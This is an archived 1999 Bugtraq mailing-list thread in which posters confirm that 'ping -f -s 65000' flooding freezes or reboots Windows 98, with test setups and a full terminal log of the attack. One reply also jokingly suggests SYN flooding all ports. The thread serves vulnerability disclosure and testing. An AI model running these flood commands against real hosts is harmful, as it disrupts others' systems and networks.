Date: Wed, 17 Feb 1999 03:17:26 -0300
From: Fabio Bastiglia Oliva 
To: BUGTRAQ@netspace.org
Subject: Pingflood attack against Windows98

rewt wrote:
>
> Try pinging the windows box with large amounts of icmp...I left 5
> screened pings, each set to 65000 size...Windows will freeze shortly
> after its loaded. You might also try to ping with -f.
>

Hey...
        I made what you suggested, and it's true... But in my case the
results were a little worse than yours...
        Windows 98 *REBOOTED* after a ping -f 65000... and wasn't need
to make several screen boxes... With only one ping -f 65000 the system
rebooted.

Best Regards
-------------------------------
Fabio Bastiglia Oliva - Director
fboliva@safenetworks.com

Safe Networks Informatica LTDA.
http://www.safenetworks.com

----------------------------------------------------------------------

Date: Thu, 18 Feb 1999 13:32:00 -0500
From: Mark A. Heilpern 
To: BUGTRAQ@netspace.org
Subject: Re: Pingflood attack against Windows98

At 03:17 AM 2/17/99 -0300, you wrote:
>rewt wrote:
>>
>> Try pinging the windows box with large amounts of icmp...I left 5
>> screened pings, each set to 65000 size...Windows will freeze shortly
>> after its loaded. You might also try to ping with -f.
>>
>
>Hey...
>       I made what you suggested, and it's true... But in my case the
>results were a little worse than yours...
>       Windows 98 *REBOOTED* after a ping -f 65000... and wasn't need
>to make several screen boxes... With only one ping -f 65000 the system
>rebooted.

I issued "ping -f -s 65000 my-win98-address" and after a single return, win98
locked up cold. I was ssh'd from win98 to linux to issue the ping, so I might
have had more returns than timing allowed to be displayed before I locked
up.

----------------------------------------------------------------------

Date: Thu, 18 Feb 1999 21:44:24 -0300
From: Fabio Bastiglia Oliva 
To: BUGTRAQ@netspace.org
Subject: Re: Pingflood attack against Windows98

Hello all,

        As I said before, forgive me, because my english is not so good!
        I'll make a "Multi-reply" in this email... It's easier ;)
        Thanks for all the replies!

------------------------------------------------------------------------
------------------------------------------------------------------------
James  wrote:
>
> This on a LAN or Internet or both?
>
>         I made this test in my LAN.

-LAN Speed: 10Mbits.
-NICs (Network Interface Card): 3Com905btx, Genius, Encore & Realtek.
-Hubs: 3Com Super Stack II.
-Windows98 Versions: 4.10.1998 (Portuguese and English versions)

------------------------------------------------------------------------
------------------------------------------------------------------------
Laurent LEVIER  wrote:
>
> I tried with the French version of Windows 98.
>
> when I run ping -l 65000 -f IPaddr.
>
> ping refuses. Of course ping -f 65000 is not accepted too.
>
> Strange the ping command changes between US & FR version.
>

        Sorry, I made a mistake when sent the email to Bugtraq. The
correct command (From Linux Slackware 3.6 Kernel 2.0.36) line is:

                ping -f -s 65000 IPaddr

------------------------------------------------------------------------
------------------------------------------------------------------------
Quantum  wrote:
>
> I just tried it & had no success at my Win98 dos prompt,
>

        Try from a linux... I got these results flooding from a
Linux Slackware 3.6 Kernel 2.0.36...

------------------------------------------------------------------------
------------------------------------------------------------------------
Tom Van Riper 
>
> yeah no kidding, the world has known a dialup connection weither it be
> windows or a unix type operating system, that a small amount of icmp
> packets will kill the connection for years, thats old stuff.
> try synfluding on ports 0-65535 for some real fun ;)

        Hehe... But a synflood just made the LAN Communication slower,
and didn't affected Windows 98 than pingflood affected!

Tom Van Riper
Dreamscape Online

------------------------------------------------------------------------

Best Regards
-------------------------------
Fabio Bastiglia Oliva - Diretor
fboliva@safenetworks.com

Safe Networks Informatica LTDA.
http://www.safenetworks.com

----------------------------------------------------------------------

Date: Fri, 19 Feb 1999 01:16:44 -0300
From: Fabio Bastiglia Oliva 
To: BUGTRAQ@netspace.org
Subject: Pingflood attack against Windows98 - The Test

Hello all,

         This is what is happening when I ping flood a Windows98 from a
Linux Slackware 3.6 (Kernel 2.0.36).


-Before the attack-

linux:~# ping 192.168.1.4
PING 192.168.1.4 (192.168.1.4): 56 data bytes
64 bytes from 192.168.1.4: icmp_seq=0 ttl=128 time=0.5 ms
64 bytes from 192.168.1.4: icmp_seq=1 ttl=128 time=0.5 ms

--- 192.168.1.4 ping statistics ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0.5/0.5/0.5 ms


-The Attack-

linux:~# ping -f -s 65000 192.168.1.4
PING 192.168.1.3 (192.168.1.4): 65000 data bytes
.......................................................................
...................................................../*After lots of
little dots... Windows98 Rebooted*/...

--- 192.168.1.4 ping statistics ---
11440 packets transmitted, 228 packets received, 98% packet loss
round-trip min/avg/max = 0.6/32.0/64.2 ms


-After the attack-

linux:~# ping 192.168.1.4
PING 192.168.1.4 (192.168.1.4): 56 data bytes

--- 192.168.1.4 ping statistics ---
4 packets transmitted, 0 packets received, 100% packet loss

---

        It's what's happening here... Anyone of you got the same
results?

Best Regards
--------------------------------
Fabio Bastiglia Oliva - Director
fboliva@safenetworks.com

Safe Networks Informatica LTDA.
http://www.safenetworks.com

    Source: geocities.com/dharan6/library/hack99

               ( geocities.com/dharan6/library)                   ( geocities.com/dharan6)